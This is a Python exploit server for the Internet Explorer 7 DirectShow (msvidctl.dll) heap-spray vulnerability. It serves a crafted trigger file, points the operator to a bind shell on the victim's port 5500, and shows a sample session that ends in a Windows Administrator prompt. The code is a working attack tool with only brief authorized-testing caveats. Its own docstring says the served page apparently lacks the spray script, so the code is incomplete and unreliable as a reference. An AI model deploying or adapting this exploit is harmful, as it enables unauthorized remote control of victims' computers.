#!/usr/bin/env python
######################################################################################
# MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray (Advisory 972890)
######################################################################################
#
# Written by SecureState R&D Team
# Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin
# http://www.securestate.com
#
# Payload: win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind
#
######################################################################################
# Tested on WinXPSP3, Win2k3SP2, WinXPSP2 on IE6 and IE7
######################################################################################
#
# This vulnerability is being exploited in the wild, so we opted to release this
# exploit to the research community. Microsoft is aware of the vulnerability.
#
######################################################################################
#
# Sample session (the address printed is the victim's; the bind shell listens there):
#
# [-] Exploit sent... [-]
# [-] Wait about 30 seconds and attempt to connect.[-]
# [-] Connect to IP Address: 10.211.55.140 and port 5500 [-]
#
# relik@sslinuxvm1:~$ telnet 10.211.55.140 5500
# Trying 10.211.55.140...
# Connected to 10.211.55.140.
# Escape character is '^]'.
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:\Documents and Settings\Administrator\Desktop>
#
# NOTE: The JavaScript code is not obfuscated in any way, so normal A/V should pick
# this up. This is intentional.
#
# Improved reliability, appears to be about 95 percent of the time. Adjusted the
# spray size a bit.
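######################################################################################

"""Serve the msvidctl.dll (Advisory 972890) heap-spray page and its trigger file.

Two URLs are answered with a body:

  /             the exploit page.  Only the banner text is written by this file;
                the title is written with no separator before the rule that
                follows it, which suggests markup (heading tags, the spray
                script and the object element that loads the trigger) sat
                between these writes in the upstream exploit -- confirm against
                the original before relying on this page to trigger anything.
  /ohn0es.jpg   the crafted data the DirectShow control parses; this is what
                triggers the overflow.

Every other path gets an empty 200.

The payload named in the header is a win32 bind shell on the victim's TCP port
5500.  This server only *prints* that address and port; the listener is opened
by the shellcode on the victim, not here.

Operational caveats -- for authorized, isolated testing only:

* The server binds every interface on a privileged port (80 by default, so it
  needs root/administrator on most systems).  Any host that can reach this
  machine can fetch the exploit page.
* A bind shell is an unauthenticated listener on the victim: anybody who can
  reach victim:5500 gets the shell, not just you.
* The "connect to" address printed per request is the TCP peer address of the
  browser; behind NAT or a proxy it is not the victim's reachable address.
* HTTPServer is single-threaded: requests are served one at a time.
"""

import binascii
import sys

try:  # Python 3
    from http.server import BaseHTTPRequestHandler, HTTPServer
except ImportError:  # Python 2
    from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer

try:
    # psyco was a Python 2 JIT; it has been dead for years and is optional here.
    import psyco
    psyco.full()
except ImportError:
    pass


LISTEN_HOST = ""       # all interfaces -- see the module docstring
LISTEN_PORT = 80       # default; override with the first command-line argument
PAYLOAD_PORT = 5500    # bind-shell port baked into the shellcode; informational only

TRIGGER_PATH = "/ohn0es.jpg"

# Hex of the crafted file served as TRIGGER_PATH, exactly as shipped by the
# authors.  The field layout is not documented here; the trailing 0c0c0c0c
# looks like the classic heap-spray landing address (consistent with the
# title), but treat that as an assumption, not a fact.
TRIGGER_HEX = (
    "000300001120340000000000000000000000000000000000000000000000000000000000"
    "000000000000000000000000000000000000000000000000000000000000ffffffff0c0c0c0c00"
)

# Body served for "/".  See the module docstring for what is (not) in here.
EXPLOIT_PAGE = (
    "\n"
    "MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray (Advisory 972890)"
    " ###############################################################################\n"
    "MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray (Advisory 972890)\n"
    "Written by SecureState R&D Team\n"
    "Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin\n"
    "http://www.securestate.com\n"
    "win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind\n"
    "Tested on WinXPSP3, Win2k3SP2, WinXPSP2 on IE6 and IE7\n"
    "###############################################################################\n"
    "\n"
)

# Printed on the operator's console once a browser has fetched "/".
EXPLOIT_SENT_MSG = (
    "\n\n[-] Exploit sent... [-]"
    "\n[-] Wait about 30 seconds and attempt to connect.[-]"
    "\n[-] Connect to IP Address: %s and port 5500 [-]"
)

_RULE = "#####################################################################################"


def _boxed(text):
    """One console-banner row, ``# text ... #``, padded to the width of _RULE."""
    return ("# " + text).ljust(len(_RULE) - 1) + "#"


CONSOLE_BANNER = "\n".join([
    "",
    _RULE,
    _boxed("MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray (Advisory 972890)"),
    _RULE,
    _boxed(""),
    _boxed("Written by SecureState R&D Team"),
    _boxed("Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin"),
    _boxed("http://www.securestate.com"),
    _boxed(""),
    _boxed("win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind"),
    _boxed(""),
    _RULE,
    _boxed("Tested on WinXPSP3, Win2k3SP2, WinXPSP2 on IE6 and IE7"),
    _RULE,
    "",
])


def build_trigger():
    """Return the crafted trigger file as bytes (decoded from TRIGGER_HEX)."""
    return binascii.unhexlify(TRIGGER_HEX)


class myRequestHandler(BaseHTTPRequestHandler):
    """Serve the exploit page on "/" and the trigger file on TRIGGER_PATH."""

    def _write(self, data):
        """Write *data* to the response body; text is encoded so Python 3 accepts it."""
        if not isinstance(data, bytes):
            data = data.encode("latin-1")
        self.wfile.write(data)

    def do_GET(self):
        """Answer every GET with 200; only "/" and TRIGGER_PATH get a body."""
        # Every path, including the trigger file, is sent as text/html.  That
        # matches the original behaviour; the control does not check the type.
        self.printCustomHTTPResponse(200)
        if self.path == TRIGGER_PATH:
            # Crafted data parsed by the vulnerable control -- *boom*.
            self._write(build_trigger())
        elif self.path == "/":
            # Peer address of the browser = where the bind shell will listen
            # (modulo NAT/proxies, see module docstring).
            victim = self.client_address[0]
            self._write(EXPLOIT_PAGE)
            print(EXPLOIT_SENT_MSG % (victim))

    def printCustomHTTPResponse(self, respcode):
        """Send the status line and a minimal text/html header set.

        send_response() already emits Server and Date headers, so the explicit
        Server header below shows up as a second one; kept as in the original.
        """
        self.send_response(respcode)
        self.send_header("Content-type", "text/html")
        self.send_header("Server", "myRequestHandler")
        self.end_headers()


def main(argv=None):
    """Bind the listener and serve until Ctrl-C.

    argv: optional argument list (defaults to sys.argv[1:]); argv[0], if given,
    overrides LISTEN_PORT.  Exits with status 1 on bind failure or Ctrl-C.
    """
    argv = sys.argv[1:] if argv is None else argv
    port = int(argv[0]) if argv else LISTEN_PORT

    try:
        httpd = HTTPServer((LISTEN_HOST, port), myRequestHandler)
    except EnvironmentError as exc:
        # Port 80 is privileged on Unix; the usual cause is running unprivileged
        # or another service already holding the port.
        sys.stderr.write("[!] Could not bind %s:%d: %s\n"
                         % (LISTEN_HOST or "0.0.0.0", port, exc))
        sys.exit(1)

    print(CONSOLE_BANNER)
    print("[-] Starting MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray [-]")
    print("[-] Have someone connect to you on port %d [-]" % port)
    print("\n\nType Ctrl-C to exit..")
    try:
        # serve_forever() handles requests one after another until interrupted.
        httpd.serve_forever()
    except KeyboardInterrupt:
        print("\n\nExiting exploit...\n\n")
        sys.exit(1)
    finally:
        # Release the listening socket even on the sys.exit() path above.
        httpd.server_close()


if __name__ == "__main__":
    main()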